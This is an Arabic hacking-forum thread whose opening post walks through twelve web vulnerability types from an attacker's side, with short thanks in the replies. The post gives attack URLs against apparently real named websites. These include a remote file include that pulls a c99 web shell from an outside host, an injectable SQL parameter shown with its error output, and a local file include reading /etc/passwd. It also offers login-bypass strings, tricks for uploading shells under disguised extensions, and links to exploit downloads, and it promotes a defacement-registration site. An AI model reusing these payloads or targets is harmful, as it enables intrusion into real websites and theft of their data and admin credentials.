شرح كامل لمعظم أنواع الثغرات ExPLoit

شرح كامل لمعظم أنواع الثغرات ExPLoit


صفحة 1 من 4 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 37

الموضوع: شرح كامل لمعظم أنواع الثغرات ExPLoit

  1. #1

    Hasri شرح كامل لمعظم أنواع الثغرات ExPLoit

    بسم الله الرحمن الرحيم

    كيفكم اخواني انشا الله بخير

    موضوعنا اليوم

    نبذه عن معظم انواع الثغرات بإذن الله العظيم

    بسم الله بدأنآ

    1 - ثغرات ريموت فايل انكلود Remot File include

    طبعا من اشهر انواع الثغرات

    سببها ،، قيام المبرمج بعمل خطأ فادح, وهو السماح لدالة انكلود

    بأن تقوم بأستدعاء اى ملف وليس ملف محدد , ومنها يمكن للمخرب ان يقوم بأستدعاء ملف خارجى

    كالشيل مثلا s1

    لكن قليلة في وقتنا هذ1

    طبعا الثغرة بتسمح لك ادراج ملف من خارج الموقع وهذا الملف بكون عبارة عن شيل s1

    خلينا نشوف مثال


    كود PHP:
    http://www.insights.co.il/site.php?page=http://shaja.jeeran.com/c99.txt? 

    معنا الموقع هذا

    الملف المصاب site.php

    المتغير المصاب ?page

    =http://shaja.jeeran.com/c99.txt

    رابط الشيل اللي هندرجو داخل الموقع

    عن طريق الملف + المتغير المصاب

    طبعآ لاننسى علامة الاستفهام ؟

    انتهيها من النوع الأول

    ---------------------------------------------

    2- SQL injection سكيول انجكشن

    طبعا تنقسم الى قسمين SQL injection php وهو الحقن في ملفات الـ php

    و SQL injection asp الحقن في ملفات asp يعني سيرفرات الويندوز والمواقع اللتي تستخدم ملفات asp

    توضيح :

    وهي ثغرات الحقن في قواعد البيانات

    خطورة الثغرة خطيرة جدآ

    لانها تسمح للمخترق بإستخراج بيانات المدير العام (admin)

    وتسمح بحقن شيل في احدى المجلدات المصرحة مثل tmp/ images ...الخ

    مثال على موقع مصاب بثغرة الحقن


    كود PHP:
    http://www.dtincr.ph/news.php?id=1 


    لاحظ لو اضفت بعد المتغير 1 علامة '

    فلاحظ وجود الخطأ


    كود PHP:
    Warningmysql_num_rows(): supplied argument is not a valid MySQL result 
    resource in 
    /home/dtincr/public_html/news.php on line 20 


    طبعا هذا خطأ سكيول

    خلينا نشرح عنه شوية

    اللي بهمنا news.php?id=1

    news.php الملف المصاب

    ?id=1 المتغير المصاب

    طبعا بيكون اكثر من رقم واحد

    مثال ?id=42 ...الخ

    مثال حي على استغلال ثغرة سكيول انجكشن





    طبعا قمت باستغلال امر load_file وقرأت اليوزرات والمسارات للسيرفر عن طريق الامر etc/passwd

    'طبعا الماجيك كوتس اوف لو انو اون كان ماعرفت أقرأ شي

    شرح من الاخ Red-D3v1L

    لاكتشاف واستغلال ثغرات الـ sql


    كود PHP:
    http://www.4shared.com/file/101817977/f7f91468/SQL_ExPloit.html 


    انتهينا من ثغرات الحقن

    ------------------------------------------

    3 - ثغرات اللوكال فايل انكلود local file include

    طبعا هذه الثغرة تسمح لك بقراءة ملفات من السيرفر s1

    مثل ملف الشادو المهم lol

    مثال على قرآءة امر استخراج يوزرات ومسارات السيرفر

    http://www.museumsinsel-berlin.de/in.../../etc/passwd

    طبعا الملف المصاب index.php

    المتغير المصاب ?lang

    وقدرنا نستغلو ونقرأ الأمر

    انتهى الشرح للنوع الثالث
    ----------------------------------------------------------

    4- ثغرات Remot file upload

    طبعا هذا النوع سهل جدا

    تسمح لك بادراج ملف

    عبارة عن رفع ملف شيل باكثر من صيغة في مراكز التحميل

    طبعا شفنا اكثر من ثغرة في مراكر التحميل العربية ولن اتطرق لوضع مثال

    طبعا الثغرة بتسمح لك برفع ملف

    ويجب عليك انك تشغل مخك

    يعني مثلا عندنا مركز تحميل مايقبل صيغة php

    نروح نجرب نرفع بامتداد rar

    يعني يكون الامتداد كذ1 c99.php.rar

    أو c99.php.gif

    طبعا بأكثر من امتداد

    ومش شرط ان الثغرة تكون في مركز التحميل فقط

    احتمال لما تسجل بالموقع تروح ترفع شيل بدل الصورة في ملفك الشخصي lol

    مثل ثغرة الـ phpizabi

    انتيهنا من النوع الرابع ..

    ------------------------------------

    5-ثغرات الـ Bypass

    من اسهل الثغرات الموجودة

    بتستطيع تدخل على اللوحة بدون الباسورد وبدون اليوزر

    عن طريق ادراج رموز مثل or '1=1

    طيب الرموز المستخدمة كثير ة


    عن استغلال ثغرات الباي بآس



    كود PHP:
    http://www.4shared.com/file/101822143/a5d458e8/Bypass.html 


    انتهينا من الشرح
    .................................................. .

    6- Database Backup Dump Vulnerability

    ثغرات خطيرة جدا

    وتسمح لك بنسخ قواعد البيانات كاملة

    طبعا لما تحمل قواعد البيانات

    رح تلاقي بآسورد المدير + الاعضاء مشفر بمقياس md5

    وطبعا مواقع الفك كثيرة

    انتهينا من النوع السادس

    ------------------------------------------------

    7- Remote Admin Password Change

    طبعا النوع هذا مشهور جدا

    وطبعا الثغرة بتسمح لك بتغير باسورد مدير الموقع بدون الحاجة للباسورد القديم

    طبعا المثال الحي ثغرة token joomla

    الجميع بيعرفها بتقدر تغير باسورد الادمن باستخدام ' رمز التوكن

    انتهينا من النوع السابع

    -------------------------------------------------

    8- perl exploit

    وهي الثغرات اللي بتكون مكتوبة بلغة البيرل

    طبعا بتقولولي كيف نعرف انو الثغرة مكتوبة بلغة البيرل

    بقوللكم

    ملفات البيرل بكون امتدادها مثل


    كود PHP:
    exploit.pl 

    او مثلا ازا رحت موقع سيكيورتي ولقيت بداية الثغرة هالكود

    كود PHP:
    #!/usr/bin/perl 



    اعرف على السريع انو الثغرة مكتوبة بلغة البيرل

    استغلالها

    لازم تكون منزل على جهازك مترجم البيرل ActivePerl

    حتى يترجم ثغرات البيرل

    طبعا الاستغلال بكون

    حفظ الثغرة بامتداد .pl

    مثلا Sec-t.pl

    طبعا البرنامج رح تنصب بالمسار هذا


    كود PHP:
    c:/perl 

    بعد ما نحفظ الثغر ة

    نروح نضع ملف Sec-t.pl


    كود PHP:
    c:/perl/bin 

    بعد هيك نروح للدوس cmd

    كود PHP:
    cd 

    وندخل لقرص c

    بعدها نتجه بالامر

    كود PHP:
    cd perl 

    يصبح مسارنا

    كود PHP:
    c:/perl 

    بعدها

    كود PHP:
    cd bin 

    رح يصبح مسارنا

    كود PHP:
    C:/pel/bin 

    بعدها شغل الثغرة بامر

    كود PHP:
    perl Sec-t.pl 

    بعدها رح يعطيك كيفية استخدام الثغرة

    انتهى شرح النوع الثامن

    ------------------------------------------

    9- ثغرات File Disclosure

    تستطيع من خلالها قراءة اي ملف من الموقع

    انتهى الشرح للنوع التاسع

    -----------------------------------
    10- ثغرات xxs Cross-Site Scripting

    وهي الثغرات اللي تستطيع من خلالها سحب الكوكيز الخاص بالضحية

    وتحليله عن طريق برنامج cookies editor

    عبر كود معين والأكواد المختصة كثيرة ماشا الله

    وشركة الهوتميل مشهورة بثغرات الـ xxs


    انتهى الشرح للنوع العاشر

    --------------------------------------------

    11- ثغرات Command Execution

    وهى كذلك مشابه لثغرات الفايل انكلود ولكن الاختلاف انك تكتب اوامر لين**

    على المتصفح بعد الاستغلال وتشبه ثغرات اللوكال انكلود s1

    لانك تقدر تقرأ ملفات من السيرفر


    -----------------------------

    12- Buffer overflow ثغرات

    الفيض overflow
    الفيض هو الزياده عن تحمل الشيء او انك تزيد عن شي فوق المسموح

    لبفر اوفر فلو عباره عن خطأ برمجي او نقص برمجي بالاصح يغفل عنه مصمم برنامج
    يسمح لك هذا الخطاء او النقص البرمجي انك تعمل تحكم في الذاكره
    عندما تدخل بيانات تفوق البفر الموجود في الذاكره مثل العمليه التي قمنا بها في الاوفر فلو
    لذلك سميت buffer overflow
    والبفر تحدث في حين المبرمج يعطي سماح لأدخال شيء ويغفل عن اعطاء تحديد للشرط
    فعند ادخال بيانات في المحدد يحدث هنا البفر

    هذا كان توضيح فقط عن ثغرات البفر اوفر فلو

    -------------------------------------------------



    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  2. #2

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    يسلمو اديك

    و الله موضوع بمنتهى الاهمية

    تحياتي
    ALZAAEM


  3. #3

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    مشكور اخي لما تقدمه للمنتدى

  4. #4

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    مشكووووور يا سلام على هالمواضيع

  5. #5
    هكر مبتديء
    تاريخ التسجيل
    Nov 2009
    الدولة
    الجزائر قلبي وغزة نبضه
    المشاركات
    17

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    تم قرائتها جميعا

    بعضها استفدت منها صراحة

    لكن الأخرى لماذا لا يوجد شرح لها أخي

  6. #6

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit


  7. #7
    هكر مبتديء الصورة الرمزية pedros47
    تاريخ التسجيل
    Oct 2009
    الدولة
    كل مكان فيه نت وثغرة
    المشاركات
    65

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    مشكور

    [marq="3;right;3;scroll"]تحياتي[/marq]

    ياريت توضيح اكثر

    بارك الله فيك

  8. #8

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    thank you very much

  9. #9

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    يعطيك الــ 1000 ــف عافيه عالمجهوود ,,

  10. #10
    محظور
    تاريخ التسجيل
    Aug 2009
    الدولة
    بلاد مابين النهرين
    المشاركات
    143

    افتراضي رد: شرح كامل لمعظم أنواع الثغرات ExPLoit

    اسمحلي ان ابدي اعجابي باسلوبك الرائع والمتميز

صفحة 1 من 4 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. أقوى اسطوانة عربية احترافية لاستغلآل جميـع أنواع الثغرات
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 285
    آخر مشاركة: 05-25-2017, 04:19 PM
  2. برنامج HEX Workshop v.6 كامل
    بواسطة Young.Hacker في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 3
    آخر مشاركة: 05-29-2015, 11:46 PM
  3. برنامج Poison Ivy كامل مع الشرح
    بواسطة She!! Access في المنتدى قسم اختراق الأجهزة
    مشاركات: 59
    آخر مشاركة: 07-18-2013, 04:51 AM
  4. الدرس الثاني شرح أنواع الثغرات ومفاهيمها
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 19
    آخر مشاركة: 11-17-2011, 07:20 PM
  5. شرح عمل فرومـآت للجهــآز كامل [بالصــوره]
    بواسطة صدى الروح في المنتدى منتدى الصيانة وتبادل الخبرات
    مشاركات: 4
    آخر مشاركة: 12-31-2010, 08:55 AM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •